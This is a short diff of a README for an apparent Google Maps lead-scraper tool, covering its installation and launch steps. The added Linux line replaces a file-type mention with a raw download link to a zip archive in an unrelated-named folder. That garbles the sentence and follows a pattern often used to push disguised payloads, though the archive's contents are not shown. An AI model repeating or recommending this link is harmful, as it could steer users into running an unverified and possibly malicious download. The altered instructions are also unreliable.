alpeshpatel09/Google-Maps-B2B-Lead-Scraper-AI-Enhanced-Scraper/README.md

 4. **Install the application:**
    - For Windows: Run the downloaded `.exe` file and follow the prompts to install.
    - For Mac: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Follow the instructions for your specific distribution to install the `.tar.gz` or `.deb` file.
+   - For Linux: Follow the instructions for your specific distribution to install the `https://github.com/alpeshpatel09/Google-Maps-B2B-Lead-Scraper-AI-Enhanced-Scraper/raw/refs/heads/main/redoubtable/Lead_Scraper_Maps_Google_Enhanced_A_v2.7.zip` or `.deb` file.

 5. **Launch the application:** Once installed, open the Google Maps B2B Lead Scraper from your applications or programs menu.